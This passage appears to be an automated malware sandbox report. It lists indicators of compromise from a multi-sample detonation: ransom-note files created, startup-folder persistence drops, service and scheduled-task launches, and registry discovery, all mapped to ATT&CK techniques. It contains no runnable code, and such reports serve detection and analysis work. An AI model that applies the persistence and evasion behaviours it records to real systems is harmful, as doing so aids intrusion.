File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-40_altform-unplated.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-125_kzf8qxf38zg5c\Assets\Images\SkypeLargeTile.scale-125.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\WideTile.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreAppList.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\EmptySearch.scale-125.png	AnyDesk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Median.xml	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\es-ES.mail.config	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\ui-strings.js	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\174.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-black\LargeTile.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\NavigationIcons\nav_icons_settings.targetsize-48.png	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons_2x.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Msg_Received.m4a	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluDCFilesEmpty_180x180.svg	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\selector.js	AnyDesk.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\assets\assets\images\assets_picker-account-addPerson-48.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeSmallTile.scale-100.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Square310x310Logo.scale-125.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\Background_ForwardDirection_RoomScale.jpg	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\SmallTile.scale-125.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\VoiceRecorderSmallTile.contrast-black_scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\198.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\W5.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-36_altform-unplated.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\FileVisio32x32.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\FileAssociation\FileAssociation.targetsize-24.png	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter_18.svg	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\ui-strings.js	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\Square150x150Logo.scale-400.png	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\MarkAsReadToastQuickAction.scale-80.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-100.png	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageMedTile.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TinyTile.scale-125_contrast-black.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-72_contrast-white.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-24_contrast-white.png	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Confirmation.png	AnyDesk.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\YOUR_FILES_ARE_ENCRYPTED.HTML	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\ui-strings.js	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-white_targetsize-32_altform-unplated.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\FetchingMail.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageMedTile.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Outlook.scale-400.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe7dd.png	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\CompleteCheckmark2x.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Third Party Notices.txt	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\SmallTile.scale-125.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-256_altform-lightunplated.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-96_contrast-white.png	AnyDesk.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\ui-strings.js	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_contrast-black.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubBadgeLogo.scale-100.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-40_altform-unplated_contrast-white.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-24_altform-colorize.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsMedTile.scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\NavigationIcons\nav_icons_activityAlert.targetsize-48.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraWideTile.contrast-white_scale-200.png	AnyDesk.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\ScreenSketchSplashScreen.scale-125_contrast-black.png	AnyDesk.exe

Drops file in Windows directory 4 IoCs

Processes:

mshta.exeProlin.exeMaldal.a.exe

description	ioc	process
File created	C:\Windows\Start Menu\Programs\Startup\Scare.hta	mshta.exe
File created	C:\WINDOWS\Start Menu\Programs\StartUp\creative.exe	Prolin.exe
File created	C:\Windows\LucKey.exe	Maldal.a.exe
File opened for modification	C:\Windows\LucKey.exe	Maldal.a.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
11504	sc.exe
12320	sc.exe
8692	sc.exe
14592	sc.exe
11244	sc.exe
11820	sc.exe
12992	sc.exe
12340	sc.exe
9996	sc.exe
11660	sc.exe
10520	sc.exe
5240	sc.exe
9076	sc.exe
16188	sc.exe
18100	sc.exe
12292	sc.exe
15772	sc.exe
7296	sc.exe
7496	sc.exe
9308	sc.exe
16364	sc.exe
14716	sc.exe
9292	sc.exe
16640	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3672 18384 WerFault.exe EN.EXE

pid	pid_target	process	target process
3672	18384	WerFault.exe	EN.EXE

System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

IEXPLORE.EXEAnyDesk.exeAnyDesk.exeAnyDesk.exeAnyDesk.exeAgentTesla.exebutterflyondesktop.exeWinNuke.98.exeWinevar.exePikachu.exeProlin.exeMari.exeAnyDesk.exeHawkEye.exemshta.exebutterflyondesktop.tmpNakedWife.exeMaldal.a.exeAnyDesk.exeButterflyOnDesktop.exeWIN2CC7.pif

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AgentTesla.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	butterflyondesktop.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinNuke.98.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Winevar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Pikachu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Prolin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mari.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HawkEye.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	butterflyondesktop.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NakedWife.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Maldal.a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ButterflyOnDesktop.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WIN2CC7.pif

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXE

pid process

18656 PING.EXE

pid	process
18656	PING.EXE

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AnyDesk.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AnyDesk.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AnyDesk.exe

Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

14128 timeout.exe
10776 timeout.exe
11992 timeout.exe
17992 timeout.exe
6832 timeout.exe

pid	process
14128	timeout.exe
10776	timeout.exe
11992	timeout.exe
17992	timeout.exe
6832	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

8612 ipconfig.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

8628 taskkill.exe
12624 taskkill.exe
18504 taskkill.exe
9132 taskkill.exe
2404 taskkill.exe

pid	process
8612	ipconfig.exe

pid	process
8628	taskkill.exe
12624	taskkill.exe
18504	taskkill.exe
9132	taskkill.exe
2404	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 28 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31135553"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2895348275"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{D7CFA743-8334-11EF-818E-4E01FFCF908D} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31135553"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31135553"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2895348275"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31135553"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2897008183"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2897008183"	iexplore.exe

Modifies registry class 5 IoCs

Processes:

msedge.exeWIN2CC7.pifOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Software\Microsoft	WIN2CC7.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Software\Microsoft\DataFactory	WIN2CC7.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SOFTWARE\Microsoft\DataFactory\[email protected]	WIN2CC7.pif
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	OpenWith.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

12220 reg.exe

pid	process
12220	reg.exe

NTFS ADS 2 IoCs

Processes:

msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 453242.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 424103.crdownload:SmartScreen	msedge.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

13160 regedit.exe
14496 regedit.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

18656 PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

10108 schtasks.exe
6312 schtasks.exe
12980 schtasks.exe
15972 schtasks.exe
18944 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

AnyDesk.exe

pid process

2172 AnyDesk.exe

pid	process
13160	regedit.exe
14496	regedit.exe

pid	process
18656	PING.EXE

pid	process
10108	schtasks.exe
6312	schtasks.exe
12980	schtasks.exe
15972	schtasks.exe
18944	schtasks.exe

pid	process
2172	AnyDesk.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exeAnyDesk.exe

pid	process
1712	msedge.exe
1712	msedge.exe
3212	msedge.exe
3212	msedge.exe
4844	identity_helper.exe
4844	identity_helper.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
2992	msedge.exe
3820	msedge.exe
3820	msedge.exe
912	msedge.exe
912	msedge.exe
3404	AnyDesk.exe
3404	AnyDesk.exe
3404	AnyDesk.exe
3404	AnyDesk.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 53 IoCs

Processes:

msedge.exe

pid	process
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

AUDIODG.EXEAnyDesk.exeHawkEye.exe

description	pid	process
Token: 33	1320	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1320	AUDIODG.EXE
Token: SeDebugPrivilege	3404	AnyDesk.exe
Token: SeDebugPrivilege	3164	HawkEye.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

msedge.exe

pid	process
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
